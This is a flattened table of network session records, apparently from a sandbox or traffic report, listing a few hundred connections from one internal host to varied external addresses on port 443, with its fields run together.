                                                        18614192.168.2.145759096.124.232.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18615192.168.2.1452226192.194.128.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18616192.168.2.1447026211.120.104.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18617192.168.2.143731687.119.69.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18618192.168.2.1437156171.185.82.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18619192.168.2.144860631.151.129.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18620192.168.2.1441476206.117.13.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18621192.168.2.145687237.5.113.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18622192.168.2.1446398207.67.42.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18623192.168.2.14536901.247.117.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18624192.168.2.1458008223.181.96.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18625192.168.2.1440186144.66.255.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18626192.168.2.1455354124.65.73.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18627192.168.2.144577613.148.57.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18628192.168.2.1442980216.0.45.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18629192.168.2.1447880187.88.50.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18630192.168.2.1453810111.92.167.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18631192.168.2.144392214.135.214.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18632192.168.2.145841275.169.181.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18633192.168.2.145757636.199.119.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18634192.168.2.144557877.95.77.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18635192.168.2.1439708141.125.204.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18636192.168.2.144264053.18.202.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18637192.168.2.145749634.38.198.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18638192.168.2.1452490212.7.164.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18639192.168.2.1437508135.77.63.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18640192.168.2.1460180136.121.181.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18641192.168.2.1456188176.241.160.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18642192.168.2.1446256112.73.177.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18643192.168.2.143507652.213.135.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18644192.168.2.1435210105.209.110.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18645192.168.2.145344647.216.210.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18646192.168.2.1439096101.88.32.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18647192.168.2.1442910139.89.185.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18648192.168.2.1450346179.62.132.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18649192.168.2.1457366115.158.160.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18650192.168.2.1459036134.192.153.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18651192.168.2.1454626121.89.146.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18652192.168.2.144836090.16.131.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18653192.168.2.1454942141.219.185.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18654192.168.2.144896697.97.4.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18655192.168.2.145405875.37.127.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18656192.168.2.1454548118.230.113.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18657192.168.2.1434348103.1.231.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18658192.168.2.145139674.78.172.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18659192.168.2.1453210222.5.86.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18660192.168.2.145621037.22.86.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18661192.168.2.1442714211.126.142.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18662192.168.2.144373439.201.213.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18663192.168.2.145189269.176.186.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18664192.168.2.1459756192.152.184.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18665192.168.2.1439038154.83.28.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18666192.168.2.14353104.159.77.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18667192.168.2.145096687.20.102.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18668192.168.2.145448659.163.183.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18669192.168.2.145869649.133.252.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18670192.168.2.1451302175.100.50.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18671192.168.2.1442820129.115.182.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18672192.168.2.1445324194.137.136.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18673192.168.2.1460216166.14.86.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18674192.168.2.144019414.123.28.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18675192.168.2.1435110181.21.220.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18676192.168.2.1452052174.107.196.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18677192.168.2.1433702190.186.140.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18678192.168.2.1456808169.95.204.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18679192.168.2.1437560124.35.43.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18680192.168.2.1445450118.137.51.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18681192.168.2.1432924145.197.156.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18682192.168.2.143511235.23.14.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18683192.168.2.1460554181.30.1.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18684192.168.2.1449652180.79.9.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18685192.168.2.14580902.87.70.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18686192.168.2.144746636.246.128.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18687192.168.2.1452472222.121.233.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18688192.168.2.1454056179.52.116.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18689192.168.2.1437314171.144.252.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18690192.168.2.1442012102.70.253.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18691192.168.2.1455782187.254.128.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18692192.168.2.1459276103.198.95.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18693192.168.2.145135484.37.185.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18694192.168.2.146087027.167.50.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18695192.168.2.1446046162.170.173.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18696192.168.2.1455380118.50.203.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18697192.168.2.1449508205.141.128.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18698192.168.2.1460506192.20.165.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18699192.168.2.143590420.252.82.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18700192.168.2.144207653.56.81.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18701192.168.2.143764265.188.174.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18702192.168.2.1450842100.60.205.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18703192.168.2.144351842.133.143.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18704192.168.2.1451612169.82.163.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18705192.168.2.144282635.228.130.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18706192.168.2.1437516102.33.212.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18707192.168.2.1458580104.51.230.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18708192.168.2.1454614138.238.224.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18709192.168.2.1441066109.78.7.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18710192.168.2.144596253.78.210.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18711192.168.2.1450458175.41.7.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18712192.168.2.1435354137.190.68.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18713192.168.2.1439660197.6.22.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18714192.168.2.144921874.93.183.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18715192.168.2.1442348106.1.33.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18716192.168.2.1444756213.56.157.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18717192.168.2.143677636.120.31.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18718192.168.2.1451250124.148.10.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18719192.168.2.1438224163.103.113.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18720192.168.2.1443102124.220.231.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18721192.168.2.1445332108.203.155.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18722192.168.2.145020043.182.2.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18723192.168.2.1443736139.147.103.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18724192.168.2.146089843.238.77.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18725192.168.2.144696464.35.205.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18726192.168.2.1439622204.198.222.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18727192.168.2.143821874.213.79.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18728192.168.2.1436940164.52.196.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18729192.168.2.1437524183.193.151.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18730192.168.2.1449984183.135.134.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18731192.168.2.1455170136.162.212.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18732192.168.2.14348062.217.232.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18733192.168.2.145169647.58.212.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18734192.168.2.1435238190.75.210.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18735192.168.2.1452564105.143.4.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18736192.168.2.1440436139.162.61.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18737192.168.2.1450696170.155.245.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18738192.168.2.1455876145.2.249.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18739192.168.2.145226484.36.188.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18740192.168.2.1453486167.50.227.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18741192.168.2.1459510106.21.20.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18742192.168.2.1448098174.184.35.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18743192.168.2.144291665.126.81.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18744192.168.2.1455572167.153.26.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18745192.168.2.144611247.221.194.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18746192.168.2.1447720132.77.134.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18747192.168.2.144799413.79.217.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18748192.168.2.14409841.20.207.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18749192.168.2.1440606177.64.133.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18750192.168.2.1437616136.151.135.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18751192.168.2.1444684132.222.240.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18752192.168.2.1452824138.199.113.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18753192.168.2.1451628114.10.176.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18754192.168.2.1441424159.67.203.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18755192.168.2.1442730194.236.225.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18756192.168.2.1448012114.12.26.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18757192.168.2.143711887.129.161.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18758192.168.2.1456508168.62.191.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18759192.168.2.1442958153.230.166.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18760192.168.2.1452964117.215.137.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18761192.168.2.1453002179.35.242.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18762192.168.2.145449451.148.192.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18763192.168.2.143647667.27.4.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18764192.168.2.143938279.90.247.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18765192.168.2.145285038.88.187.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18766192.168.2.1443468145.72.184.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18767192.168.2.1436306159.238.147.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18768192.168.2.14469288.196.236.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18769192.168.2.1440092109.227.172.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18770192.168.2.143684087.64.204.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18771192.168.2.144372425.98.219.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18772192.168.2.143942863.116.9.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18773192.168.2.1459386179.101.20.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18774192.168.2.1459084210.153.92.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18775192.168.2.1460620136.162.191.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18776192.168.2.1438558221.248.65.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18777192.168.2.145609236.67.67.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18778192.168.2.1456670223.125.234.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18779192.168.2.1451868166.86.97.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18780192.168.2.143852220.147.101.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18781192.168.2.1441690103.163.83.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18782192.168.2.1450758104.253.216.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18783192.168.2.1442754109.232.44.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18784192.168.2.1443462112.229.85.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18785192.168.2.1436026171.78.205.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18786192.168.2.1460006135.195.7.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18787192.168.2.1435202126.109.123.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18788192.168.2.1460812172.153.222.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18789192.168.2.143860669.153.159.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18790192.168.2.143839225.249.82.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18791192.168.2.1454164122.120.101.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18792192.168.2.1445854131.23.120.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18793192.168.2.1454376203.124.115.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18794192.168.2.1447822129.213.190.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18795192.168.2.1457038191.153.91.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18796192.168.2.1437716144.60.132.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18797192.168.2.14392348.185.243.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18798192.168.2.1433054123.101.119.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18799192.168.2.1433826101.243.109.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18800192.168.2.1446836160.35.160.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18801192.168.2.144357268.88.113.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18802192.168.2.144743269.248.71.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18803192.168.2.14504121.83.165.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18804192.168.2.146083067.69.193.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18805192.168.2.1445416209.223.202.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18806192.168.2.145311857.222.86.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18807192.168.2.144634618.190.32.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18808192.168.2.1441530121.76.93.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18809192.168.2.146071094.17.159.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18810192.168.2.1457112163.52.89.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18811192.168.2.145045887.143.209.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18812192.168.2.1443954146.47.93.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18813192.168.2.1450922154.169.187.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18814192.168.2.143401292.221.208.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18815192.168.2.143613863.49.111.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18816192.168.2.1454152189.194.108.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18817192.168.2.143347625.72.75.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18818192.168.2.1456574192.246.247.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18819192.168.2.1458860203.49.201.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18820192.168.2.1453530124.227.99.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18821192.168.2.1452950142.234.214.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18822192.168.2.1434700119.199.214.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18823192.168.2.1434388148.150.74.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18824192.168.2.1454874102.2.121.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18825192.168.2.1443686167.121.75.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18826192.168.2.144432660.31.138.20443
